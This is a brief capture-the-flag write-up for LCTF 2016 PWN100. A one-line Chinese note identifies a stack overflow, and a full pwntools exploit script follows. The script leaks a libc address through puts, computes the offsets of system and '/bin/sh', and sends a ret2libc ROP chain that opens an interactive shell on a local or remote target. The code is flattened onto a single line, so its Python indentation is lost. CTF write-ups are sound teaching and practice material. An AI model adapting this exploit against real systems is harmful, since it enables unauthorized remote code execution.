LCTF-2016-PWN100
栈溢出。可以通过libcdb.com获取libc.so.6和对应的libc关键函数偏移。或者使用libc-database。
#!/usr/bin/env python from pwn import * DEBUG = 1 if DEBUG: context.log_level = 'debug' p = process('./pwn1003s4de5rf76tg87yhu') gdb.attach(p) else: p = remote('119.28.63.211','2332') offset___libc_start_main_ret = 0x21f45 offset_system = 0x0000000000046590 offset_dup2 = 0x00000000000ebe90 offset_read = 0x00000000000eb6a0 offset_write = 0x00000000000eb700 offset_str_bin_sh = 0x17c8c3 pop_rdi = 0x400763 plt_puts = 0x400500 got_read = 0x601028 def pwn(): payload = 'a'*72 + p64(pop_rdi)+p64(got_read)+p64(plt_puts)+p64(0x40068E) payload = payload.ljust(200) p.sendline(payload) p.recv(5) addr_read = u64(p.recvn(6).ljust(8,'\x00')) print 'read: '+hex(addr_read) addr_libc = addr_read - offset_read addr_system = addr_libc + offset_system addr_binsh = addr_libc + offset_str_bin_sh print 'libc: ' + hex(addr_libc) print 'system: ' + hex(addr_system) print 'binsh: ' + hex(addr_binsh) payload2 = 'b'*71 + p64(pop_rdi) + p64(addr_binsh) + p64(addr_system) + p64(0xdeadbeef) payload2 = payload2.ljust(200) p.sendline(payload2) p.interactive() if __name__ == '__main__': pwn()